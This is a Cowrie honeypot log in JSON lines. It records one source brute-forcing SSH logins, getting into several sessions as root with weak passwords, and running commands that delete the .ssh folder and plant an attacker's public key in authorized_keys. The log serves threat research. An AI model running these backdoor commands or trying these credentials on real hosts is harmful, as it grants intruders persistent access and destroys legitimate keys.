{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:07:38.929945Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:07:38.931249Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:39.184612Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:07:39.706214Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:07:39.706923Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:07:39.960216Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:39.961177Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56032,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a7c5596788a","protocol":"ssh","message":"New connection: 212.227.235.229:56032 (1.2.3.4:22) [session: 1a7c5596788a]","sensor":"my-vps","timestamp":"2025-08-26T13:07:40.204258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:40.205156Z","src_ip":"212.227.235.229","session":"1a7c5596788a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:40.448051Z","src_ip":"212.227.235.229","session":"1a7c5596788a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:07:41.482535Z","src_ip":"212.227.235.229","session":"1a7c5596788a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53002,"dst_ip":"1.2.3.4","dst_port":22,"session":"28b9119055bf","protocol":"ssh","message":"New connection: 212.227.235.229:53002 (1.2.3.4:22) [session: 28b9119055bf]","sensor":"my-vps","timestamp":"2025-08-26T13:07:42.027064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:42.028187Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:42.230875Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:42.731557Z","src_ip":"212.227.235.229","session":"1a7c5596788a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42612,"dst_ip":"1.2.3.4","dst_port":22,"session":"113a99a4be83","protocol":"ssh","message":"New connection: 212.227.235.229:42612 (1.2.3.4:22) [session: 113a99a4be83]","sensor":"my-vps","timestamp":"2025-08-26T13:07:43.000077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:43.000904Z","src_ip":"212.227.235.229","session":"113a99a4be83"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome2025!","message":"login attempt [root/Welcome2025!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:07:43.154405Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:43.269579Z","src_ip":"212.227.235.229","session":"113a99a4be83"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:07:43.604821Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:07:43.605609Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:07:43.607267Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:43.803522Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:07:44.255505Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:07:44.256177Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:07:44.411012Z","src_ip":"212.227.235.229","session":"113a99a4be83"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:07:44.452840Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:44.453660Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54896,"dst_ip":"1.2.3.4","dst_port":22,"session":"b39ab77df232","protocol":"ssh","message":"New connection: 212.227.235.229:54896 (1.2.3.4:22) [session: b39ab77df232]","sensor":"my-vps","timestamp":"2025-08-26T13:07:44.635014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:44.636492Z","src_ip":"212.227.235.229","session":"b39ab77df232"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:44.676238Z","src_ip":"212.227.235.229","session":"61d2240b8b49"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:44.679527Z","src_ip":"212.227.235.229","session":"113a99a4be83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:44.822650Z","src_ip":"212.227.235.229","session":"b39ab77df232"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:07:45.643743Z","src_ip":"212.227.235.229","session":"b39ab77df232"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:46.833591Z","src_ip":"212.227.235.229","session":"b39ab77df232"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56202,"dst_ip":"1.2.3.4","dst_port":22,"session":"3efb4bf1833e","protocol":"ssh","message":"New connection: 212.227.235.229:56202 (1.2.3.4:22) [session: 3efb4bf1833e]","sensor":"my-vps","timestamp":"2025-08-26T13:07:47.059085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:07:47.060267Z","src_ip":"212.227.235.229","session":"3efb4bf1833e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:07:47.271325Z","src_ip":"212.227.235.229","session":"3efb4bf1833e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:07:48.127215Z","src_ip":"212.227.235.229","session":"3efb4bf1833e"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:48.338923Z","src_ip":"212.227.235.229","session":"28b9119055bf"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:07:48.348161Z","src_ip":"212.227.235.229","session":"3efb4bf1833e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53786,"dst_ip":"1.2.3.4","dst_port":22,"session":"26bf3cb5bfca","protocol":"ssh","message":"New connection: 212.227.235.229:53786 (1.2.3.4:22) [session: 26bf3cb5bfca]","sensor":"my-vps","timestamp":"2025-08-26T13:08:42.441925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:08:42.442910Z","src_ip":"212.227.235.229","session":"26bf3cb5bfca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:08:42.684586Z","src_ip":"212.227.235.229","session":"26bf3cb5bfca"}
{"eventid":"cowrie.login.failed","username":"home","password":"123","message":"login attempt [home/123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:08:43.694393Z","src_ip":"212.227.235.229","session":"26bf3cb5bfca"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:08:44.938981Z","src_ip":"212.227.235.229","session":"26bf3cb5bfca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60344,"dst_ip":"1.2.3.4","dst_port":23,"session":"3ac597d65c9d","protocol":"telnet","message":"New connection: 212.227.235.229:60344 (1.2.3.4:23) [session: 3ac597d65c9d]","sensor":"my-vps","timestamp":"2025-08-26T13:08:47.274699Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45870,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb76eb31f7b1","protocol":"ssh","message":"New connection: 212.227.235.229:45870 (1.2.3.4:22) [session: cb76eb31f7b1]","sensor":"my-vps","timestamp":"2025-08-26T13:09:00.530174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:09:00.531128Z","src_ip":"212.227.235.229","session":"cb76eb31f7b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:09:00.776275Z","src_ip":"212.227.235.229","session":"cb76eb31f7b1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"admin12345","message":"login attempt [ubuntu/admin12345] failed","sensor":"my-vps","timestamp":"2025-08-26T13:09:01.804352Z","src_ip":"212.227.235.229","session":"cb76eb31f7b1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:09:03.053168Z","src_ip":"212.227.235.229","session":"cb76eb31f7b1"}
{"eventid":"cowrie.session.connect","src_ip":"61.227.119.66","src_port":45289,"dst_ip":"1.2.3.4","dst_port":23,"session":"d6ce919ce9f5","protocol":"telnet","message":"New connection: 61.227.119.66:45289 (1.2.3.4:23) [session: d6ce919ce9f5]","sensor":"my-vps","timestamp":"2025-08-26T13:09:11.404082Z"}
{"eventid":"cowrie.session.closed","duration":31.47097682952881,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:09:18.745584Z","src_ip":"212.227.235.229","session":"3ac597d65c9d"}
